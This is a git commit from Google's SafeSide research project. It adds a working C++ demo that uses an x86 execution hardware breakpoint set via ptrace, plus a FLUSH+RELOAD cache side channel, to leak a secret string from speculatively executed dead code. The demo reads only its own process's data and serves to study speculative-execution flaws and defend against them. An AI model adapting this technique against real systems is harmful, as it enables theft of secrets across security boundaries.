Speculation over execution hardware breakpoint fault. (#72)
Also making ForceRead inlined to avoid the call and ret instructions in the speculation window.
diff --git a/demos/CMakeLists.txt b/demos/CMakeLists.txt
index 7322953..c6391be 100644
--- a/demos/CMakeLists.txt
+++ b/demos/CMakeLists.txt
@@ -102,10 +102,14 @@
if((${CMAKE_SYSTEM_NAME} MATCHES "^(Linux)$") AND
(${CMAKE_SYSTEM_PROCESSOR} MATCHES "^(i.86)|(x86_64)$"))
- # Speculation over hardware breakpoint trap
+ # Speculation over hardware breakpoint trap (read watcher)
add_executable(speculation_over_hw_breakpoint speculation_over_hw_breakpoint.cc)
target_link_libraries(speculation_over_hw_breakpoint safeside)
+ # Speculation over hardware breakpoint fault (execution watcher)
+ add_executable(speculation_over_exec_hw_breakpoint speculation_over_exec_hw_breakpoint.cc)
+ target_link_libraries(speculation_over_exec_hw_breakpoint safeside)
+
# Meltdown AC -- speculative fetching of unaligned data
add_executable(meltdown_ac meltdown_ac.cc)
target_link_libraries(meltdown_ac safeside)
diff --git a/demos/speculation_over_exec_hw_breakpoint.cc b/demos/speculation_over_exec_hw_breakpoint.cc
new file mode 100644
index 0000000..3d90897
--- /dev/null
+++ b/demos/speculation_over_exec_hw_breakpoint.cc
@@ -0,0 +1,218 @@
+/*
+ * Copyright 2019 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * https://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+/**
+ * Demonstrates speculative execution over hardware breakpoint fault.
+ * That is a breakpoint that guards an instruction address and is triggered when
+ * that instruction is executed (not read nor written).
+ * We fork the process and run the demonstration in the child, while the parent
+ * takes care for setting up the breakpoint and moving the instruction pointer
+ * over the dead code after the fault.
+ **/
+
+#include "compiler_specifics.h"
+
+#if !SAFESIDE_LINUX
+# error Unsupported OS. Linux required.
+#endif
+
+#if !SAFESIDE_IA32 && !SAFESIDE_X64
+# error Unsupported CPU. X86/64 required.
+#endif
+
+#include <array>
+#include <cstring>
+#include <iostream>
+
+#include <signal.h>
+#include <sys/ptrace.h>
+#include <sys/types.h>
+#include <sys/user.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#include "cache_sidechannel.h"
+#include "instr.h"
+#include "local_content.h"
+#include "utils.h"
+
+// Points to the "nop" instruction that will be guarded by the execution
+// breakpoint.
+extern char breakpoint[];
+
+static char LeakByte(const char *data, size_t offset) {
+ CacheSideChannel sidechannel;
+ const std::array<BigByte, 256> &oracle = sidechannel.GetOracle();
+
+ for (int run = 0;; ++run) {
+ size_t safe_offset = run % strlen(public_data);
+ sidechannel.FlushOracle();
+
+ // We have to precompute the addresses in the oracle, because here the
+ // speculation window on Intel (not on AMD) is too small to allow
+ // computation of the unsafe address in the oracle speculatively.
+ const void *safe_address =
+ oracle.data() + static_cast<size_t>(data[safe_offset]);
+
+ // Architecturally dead variable - never read again. It is also the only
+ // fetch of the "data[offset]". Therefore its value is architecturally
+ // isolated from the rest of the program.
+ const void *unsafe_address =
+ oracle.data() + static_cast<size_t>(data[offset]);
+
+ // Successful access of the safe address in the Oracle.
+ ForceRead(safe_address);
+
+ // NOP instruction after the breakpoint label. That one is guarded by the
+ // execution breakpoint. Contrary to the read/write hardware watcher, this
+ // is a fault (not a trap) and the tracer moves the instruction pointer to
+ // afterspeculation instead.
+ asm volatile(
+ "breakpoint:\n"
+ "nop\n");
+
+ // Dead code. Executed only speculatively.
+ ForceRead(unsafe_address);
+
+ std::cout << "Dead code. Must not be printed." << std::endl;
+
+ // The exit call must not be unconditional, otherwise clang would optimize
+ // out everything that follows it and the linking would fail.
+ if (strlen(public_data) != 0) {
+ exit(EXIT_FAILURE);
+ }
+
+ // Tracer moves the instruction pointer to this label.
+ asm volatile("afterspeculation:");
+
+ std::pair<bool, char> result =
+ sidechannel.RecomputeScores(public_data[safe_offset]);
+
+ if (result.first) {
+ return result.second;
+ }
+
+ if (run > 100000) {
+ std::cerr << "Does not converge " << result.second << std::endl;
+ exit(EXIT_FAILURE);
+ }
+ }
+}
+
+void ChildProcess() {
+ // Allow the parent to trace child's execution.
+ int res = ptrace(PTRACE_TRACEME, 0, nullptr, nullptr);
+ if (res == -1) {
+ std::cerr << "PTRACE_TRACEME failed." << std::endl;
+ exit(EXIT_FAILURE);
+ }
+
+ // Synchronize with the parent. Let it setup the hardware breakpoint on the
+ // critical nop instruction.
+ raise(SIGSTOP);
+ MemoryAndSpeculationBarrier();
+
+ std::cout << "Leaking the string: ";
+ std::cout.flush();
+ const size_t private_offset = private_data - public_data;
+ for (size_t i = 0; i < strlen(private_data); ++i) {
+ std::cout << LeakByte(public_data, private_offset + i);
+ std::cout.flush();
+ }
+ std::cout << "\nDone!\n";
+}
+
+void ParentProcess(pid_t child) {
+ while (true) {
+ int wstatus, res;
+ wait(&wstatus);
+ if (!WIFSTOPPED(wstatus)) {
+ break; // Unexpected wait event.
+ }
+
+ if (WSTOPSIG(wstatus) == SIGSTOP) {
+ // Set debug registers.
+ // The child stopped itself with "raise(SIGSTOP)". We have to put the
+ // breakpoint on the "nop" instruction marked by the "breakpoint" label
+ // and let the child continue.
+ res = ptrace(PTRACE_POKEUSER, child, offsetof(user, u_debugreg[0]),
+ breakpoint);
+ if (res == -1) {
+ std::cerr << "PTRACE_POKEUSER on dr0 failed." << std::endl;
+ exit(EXIT_FAILURE);
+ }
+
+ // Setting the 0th bit in dr7.
+ // 0th bit means the active breakpoint is in local dr0.
+ // We leave the length bits set to 00 so that we get one-byte
+ // granularity. We also leave the mode bits set to 00, because it's an
+ // execution breakpoint.
+ res = ptrace(PTRACE_POKEUSER, child, offsetof(user, u_debugreg[7]), 0x1);
+ if (res == -1) {
+ std::cerr << "PTRACE_POKEUSER on dr7 failed." << errno << std::endl;
+ exit(EXIT_FAILURE);
+ }
+ } else if (WSTOPSIG(wstatus) == SIGTRAP) {
+ // Move instruction pointer.
+ // The child was trapped by executing the hardware breakpoint. We just
+ // move its instruction pointer to the afterspeculation label.
+ user_regs_struct regs;
+ // Read general purpose register values of the child.
+ res = ptrace(PTRACE_GETREGS, child, nullptr, ®s);
+ if (res == -1) {
+ std::cerr << "PTRACE_GETREGS failed." << std::endl;
+ exit(EXIT_FAILURE);
+ }
+
+ // Move the child's instruction pointer to afterspeculation.
+#if SAFESIDE_X64
+ regs.rip = reinterpret_cast<size_t>(afterspeculation);
+#else
+ regs.eip = reinterpret_cast<size_t>(afterspeculation);
+#endif
+
+ // Store the shifted child's instruction pointer value.
+ res = ptrace(PTRACE_SETREGS, child, nullptr, ®s);
+ if (res == -1) {
+ std::cerr << "PTRACE_SETREGS failed." << std::endl;
+ exit(EXIT_FAILURE);
+ }
+ } else {
+ // Unexpected signal received by the child.
+ // The child didn't stop with SIGSTOP nor SIGTRAP.
+ // Terminating the parent.
+ break;
+ }
+
+ // Wake up the child.
+ res = ptrace(PTRACE_CONT, child, nullptr, nullptr);
+ if (res == -1) {
+ std::cerr << "PTRACE_CONT after signal failed." << std::endl;
+ exit(EXIT_FAILURE);
+ }
+ }
+}
+
+int main() {
+ pid_t pid = fork();
+ if (pid == 0) {
+ // Tracee.
+ ChildProcess();
+ } else {
+ // Tracer.
+ ParentProcess(pid);
+ }
+}
diff --git a/demos/utils.cc b/demos/utils.cc
index fb3264a..872cda9 100644
--- a/demos/utils.cc
+++ b/demos/utils.cc
@@ -21,13 +21,6 @@
constexpr size_t kCacheLineSize = 64;
-// Forced memory load. Used during both real and speculative execution to create
-// a microarchitectural side effect in the cache. Also used for latency
-// measurement in the FLUSH+RELOAD technique.
-void ForceRead(const void *p) {
- (void)*reinterpret_cast<const volatile char *>(p);
-}
-
// Flush a memory interval from cache. Used to induce speculative execution on
// flushed values until they are fetched back to the cache.
void FlushFromCache(const char *start, const char *end) {
diff --git a/demos/utils.h b/demos/utils.h
index e961c37..914290f 100644
--- a/demos/utils.h
+++ b/demos/utils.h
@@ -14,11 +14,21 @@
* limitations under the License.
*/
-// Forced memory load. Used during both real and speculative execution to create
-// a microarchitectural side effect in the cache. Also used for latency
-// measurement in the FLUSH+RELOAD technique.
-void ForceRead(const void *p);
+#ifndef DEMOS_UTILS_H
+#define DEMOS_UTILS_H
+
+#include "compiler_specifics.h"
+
+// Forced memory load. Loads the memory into cache. Used during both real and
+// speculative execution to create a microarchitectural side effect in the
+// cache. Also used for latency measurement in the FLUSH+RELOAD technique.
+// Should be inlined to minimize the speculation window.
+SAFESIDE_ALWAYS_INLINE
+inline void ForceRead(const void *p) {
+ (void)*reinterpret_cast<const volatile char *>(p);
+}
// Flush a memory interval from cache. Used to induce speculative execution on
// flushed values until they are fetched back to the cache.
void FlushFromCache(const char *start, const char *end);
+#endif // DEMOS_UTILS_H